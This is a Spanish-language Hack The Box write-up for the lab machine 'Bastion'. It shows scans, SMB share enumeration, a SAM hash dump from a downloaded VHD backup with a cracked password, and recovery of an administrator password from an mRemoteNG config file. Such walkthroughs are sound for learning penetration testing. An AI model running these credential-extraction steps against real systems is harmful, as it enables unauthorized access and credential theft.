Bastion
Bastion
Bastion Windows · Easy - Adventure mode
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -sSVC bastion.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 20:47 CET
Nmap scan report for bastion.htb (10.129.98.120)
Host is up (0.045s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m59s, deviation: 34m35s, median: -1s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-01-25T20:49:22+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-25T19:49:18
|_ start_date: 2026-01-25T19:45:50
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.05 seconds
El escaneo de Nmap nos muestra unos cuantos puertos abiertos
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(pmartinezr㉿kali)-[~]
└─$ nmap --script smb-enum-shares bastion.htb -p 445
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-25 20:56 CET
Nmap scan report for bastion.htb (10.129.98.120)
Host is up (0.042s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.129.98.120\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.98.120\Backups:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
| Current user access: READ
| \\10.129.98.120\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.129.98.120\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: <none>
|_ Current user access: READ/WRITE
Siempre es buena idea hacer enumeración
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ smbclient -N //bastion.htb/Backups
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 25 20:54:09 2026
.. D 0 Sun Jan 25 20:54:09 2026
nmap-test-file A 260 Sun Jan 25 20:54:09 2026
note.txt AR 116 Tue Apr 16 12:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 13:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 13:44:02 2019
5638911 blocks of size 4096. 1175689 blocks available
smb: \> cd WindowsImageBackup\
smb: \WindowsImageBackup\> ls
. Dn 0 Fri Feb 22 13:44:02 2019
.. Dn 0 Fri Feb 22 13:44:02 2019
L4mpje-PC Dn 0 Fri Feb 22 13:45:32 2019
5638911 blocks of size 4096. 1175689 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC\
smb: \WindowsImageBackup\L4mpje-PC\> ls
. Dn 0 Fri Feb 22 13:45:32 2019
.. Dn 0 Fri Feb 22 13:45:32 2019
Backup 2019-02-22 124351 Dn 0 Fri Feb 22 13:45:32 2019
Catalog Dn 0 Fri Feb 22 13:45:32 2019
MediaId An 16 Fri Feb 22 13:44:02 2019
SPPMetadataCache Dn 0 Fri Feb 22 13:45:32 2019
5638911 blocks of size 4096. 1175689 blocks available
Nmap done: 1 IP address (1 host up) scanned in 32.31 seconds
Parece que el directorio de Backups es accesible, debemos continuar por aquí claramente.
1
2
3
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
La nota dice que no transfieras el backup, pero en los backups está la clave de muchos retos. En la “basura” se puede encontrar el tesoro.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
. Dn 0 Fri Feb 22 13:45:32 2019
.. Dn 0 Fri Feb 22 13:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 13:44:02 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 13:44:03 2019
BackupSpecs.xml An 1186 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 13:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 13:45:32 2019
5638911 blocks of size 4096. 1175705 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> get 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
getting file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd of size 37761024 as 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd (3438.0 KiloBytes/sec) (average 3438.0 KiloBytes/sec)
Nos bajamos los dos archivos 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd y 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd. Esto me obligó a servir los archivos y montarlos en otro PC con Windows.
1
2
3
4
5
6
7
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
Luego podemos hacer uso de samdump2 una vez extraemos los archivos SYSTEM y SAM
👽 Acciones:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ ssh L4mpje@bastion.htb
L4mpje@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>type Desktop\user.txt
917d20037cd9522698a02167bc811246
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="
AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpa
P5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-a
ff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dma
PFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Defau
lt Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionSt
rength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="fals
Aquí ya tenemoa la primera bandera. Pero hay que buscar más. La vulnerabilidad de esta máquina reside en el uso de mRemoteNG pues parece que está aplicación sufre de cierta debilidad de almacenamiento de credenciales y por lo tanto estos archivos si están creados con versiones antiguas se pueden extraer la contraseña con ciertas acciones
1
2
3
4
5
6
7
┌──(pmartinezr㉿kali)-[~/htb/bastion]
└─$ scp l4mpje@bastion.htb:"C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml" .
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
l4mpje@bastion.htb's password:
confCons.xml
Descargo el archivo confCons.xml con scp.
Después de esto hay que importar este archivo en el cliente de mRemoteNG y luego con la Herramientas externas creamos hacemos lo siguiente: Creamos una herramienta externa que consiste en el archivo cmd.exe`` y como argumento /k echo "password %password%". Ahora seleccionarmos DC (que es la conexión de Administrador) y desde el menú seleccionarmos la herramienta que acabamos de crear Nos mostrará lo siguiente password thXLHM96BeKL0ER2
1
2
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
00021eb062a910c253dd7da308911335
Ahora utilzamos la password para conectarnos como ```administrator``. Lo que aprendí con esta máquina es que debemos buscar que aplicaciones se usan en el sistema y tratar de averiguar sus debilidades.
Esta entrada está licenciada bajo CC BY 4.0 por el autor.